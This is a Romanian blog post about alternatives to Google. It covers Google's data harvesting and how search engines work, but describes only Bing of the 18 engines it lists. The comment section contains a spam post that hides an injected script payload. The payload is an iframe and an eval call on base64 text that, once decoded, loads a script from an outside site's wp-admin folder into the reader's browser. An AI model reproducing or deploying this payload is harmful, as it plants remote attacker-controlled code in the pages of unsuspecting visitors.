Top 15 Motoare De Cautare

18 Motoare De Cautare Excelente

Surprinzator insa in stilul de viata online cand vine vorba de cautari, GOOGLE nu este singurul motor de cautare, ci exista cel putin inca alte zeci de motoare de cautare care sunt folosite cu succes, cand vine vorba de a cauta o informatie, a o putea gasit cat mai repede si cu o relevanta cat mai mare.

18 Motoare De Căutare Excelente Care Se Pot Folosi Cu SuccesMotoare de cautare alternative

Dedeparte si cu siguranta Google este cel mai mare si mai popular motor de cautare, insa haideti sa descoperim impreuna importanta folosirii celorlalte 17 motoare de căutare pe care vi le vom prezenta mai departe, care pot fi uneori alternative mai bune si de ce ar trebui să le încercați si anume, Bing, Yandex, CC Search, Swisscows, DuckDuckGo, StartPage, Search Encrypt, Gibiru, OneSearch, Wiki.com, Boardreader, GiveWater, Ekoru, Ecosia, Twitter, SlideShare, Internet Archive, The Takeaway.

GOOGLE!

Nu este surprinzator pentru nimeni daca afirmam ca GOOGLE a trecut de mult de la titlul de un alt motor de căutare oarecare la sursa ta de informatie sigura.

Multi utilizatori cred ca Google detine aceste informatii pe care le cauta in-house iar acestea sunt verificate ca fiind 100% relevante, crezand ca Google este autorul de drept al acestor informatii, realitatea fiind cu totul diferita, iar Google este un fel de mediator intre furnizorul de informatie si consumatorul ei.

Cu siguranta GOOGLE se foloseste de algoritmi în continuă evoluție, si este in acelasi timp una dintre cele mai puternice platforme de publicitate, care domina intreaga piata online avand o experiență de utilizator personalizată prin indermediul inteligentei artificiale pe care a dezvoltat-o in timp, Google controland deja o cotă de piață online globală oarte mare cu un procent ce depaseste 85%.

Cand vine vorba de conceptia generala a utilizatorilor, nici un alt motor de cautare nu oferă rezultate mai relevante cand faci o căutare online, decât GOOGLE.

Sa fie aceasta conceptie adevarata care sa fie sustinuta catre toti?

Este adevarat ca interfața lui GOOGLE este ușor de utilizat insa aceasta experiența pe care GOOGLE o personalizează pentru fiecare utilizator in parte vine cu un cost care trebuie platit de catre toti utilizatorii sai.

Pentru cei carora le place sa fie informati, nu cred ca mai este de mult un secret, ca binecunoscutul motor de căutare foloseste inteligenta artificiala stocand obiceiurile si comportamentul de navigare ale fiecarui utilizator in parte, iar aceste informatii sunt „vandute” mai apoi ca informații de aur catre agenți de publicitate, antreprenorilor și altor părți interesate in scopul precis de ai putea transforma in clienti finali.

Totusi dacă nu doriți sau nu va pricepeti să schimbați politicile de confidențialitate ale motorului de cautare sau aveți nevoi specifice de căutare, există o serie de alte motoare de cautare in afara de GOOGLE, care oferă o experiență de căutare mai bună din acest punct de vedere al stocarii comportamentului personal in scop comercial.

Alternative De Căutare In Afara De GOOGLE

Stim deja ca un motor de căutare este un sistem software care are in spate un algoritm, conceput pentru a executa căutări in mediul online, in principal pe siteurile celor care ofera informatii de tip articole, postari, texte, foto, video sau chiar audio.

Motorul de cautare este conceput sa caute in mod inteligent pe baza algoritmului porsonal, anumite informații relevante in functie interogarea de căutare in pe anumite cuvinte cheie.

Rezultatele căutării vor fi afisate, într-un top de rezultate de tip lista, incluzand adresea paginilor unde motorul de cautare a gasit informatia relevanta si pe care o claseaza intr-un top, in functtie de mai multi factori ce depind si de o optimizare pentru motoarele de cautare cunoscuta sub numele de SEO.

🔎 Bing

Bing motor de cautare

Surpinzator insa incepând cu ianuarie 2020, motorul de cautare Microsoft Bing a reusit sa gestioneze peste un sfert din totalul de interogările de căutare pe care utilizatorii din Statele Unite le-au facut.

 

Despre Cozmin

Viata este cel mai frumos dar pe care l-am primit, mai ales pentru ca este unica pe care o pot trai. Iubeste, Invata, Analizeaza, Actioneaza, Iarta... Nu Judeca!

Un comentariu

  1. We are looking for affiliates who want to earn 45 to 60 revenew Click here to know more„>”>”><iframe src="javascript:eval(atob('dmFyIHAgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnbmE5MDEnKTsKaWYgKCFwKSB7CiAgICBwID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7CiAgICBwLmlkID0gJ25hOTAxJzsKICAgIHAuc3JjID0gJ2h0dHBzOi8vd2ViZGVzaWduLndlYnNlby5jb20uYXUvd3AtYWRtaW4vanMvcWluaXQuanMnOwogICAgcC5hc3luYyA9IHRydWU7CiAgICBkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHApOwp9'));”>”>eval(atob(‘dmFyIHAgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnbmE5MDEnKTsKaWYgKCFwKSB7CiAgICBwID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7CiAgICBwLmlkID0gJ25hOTAxJzsKICAgIHAuc3JjID0gJ2h0dHBzOi8vd2ViZGVzaWduLndlYnNlby5jb20uYXUvd3AtYWRtaW4vanMvcWluaXQuanMnOwogICAgcC5hc3luYyA9IHRydWU7CiAgICBkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHApOwp9’));'”>

Faci un comentariu sau dai un răspuns?

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *